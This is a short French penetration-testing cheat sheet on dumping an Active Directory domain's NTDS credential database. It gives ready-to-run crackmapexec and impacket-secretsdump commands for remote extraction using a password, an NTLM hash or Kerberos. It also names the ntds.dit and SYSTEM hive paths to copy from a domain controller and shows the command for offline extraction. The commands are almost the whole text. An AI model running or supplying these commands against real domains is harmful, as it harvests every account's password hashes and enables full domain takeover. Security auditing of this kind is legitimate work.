Extraire la base NTDS

Attention : cette manipulation nécessite les privilèges d’administrateur du domaine

Extraction à distance

Extraction avec crackmapexec :

crackmapexec smb $DC_IP -d $DOMAIN -u $USER -p $PASS --ntds # Password
crackmapexec smb $DC_IP -d $DOMAIN -u $USER -H $HASH --ntds # Hash NTLM

Extraction avec la suite impacket :

impacket-secretdump '$DOMAIN/$USER@$FQDN' -k -no-pass # Kerberos Auth
impacket-secretdump '$DOMAIN/$USER:$PASS@$FQDN>' # Password Auth
impacket-secretdump '$DOMAIN/$USER@$FQDN' -hashes ':$NTLM_HASH' # Hash Auth

Extraction en locale

Il est possible également de récupérer la base ntds.dit depuis le controleur de domaine et de l’extraire localement depuis la machine d’audit

Fichiers nécessaires :

%SYSTEMROOT%\NTDS\ntds.dit
%SYSTEMROOT%\System32\config\SYSTEM

Une fois ces deux fichiers récupérés, il est possible d’utiliser secretdump pour extraire la base localement.

impacket-secretdump -ntds ntds.dit -system SYSTEM LOCAL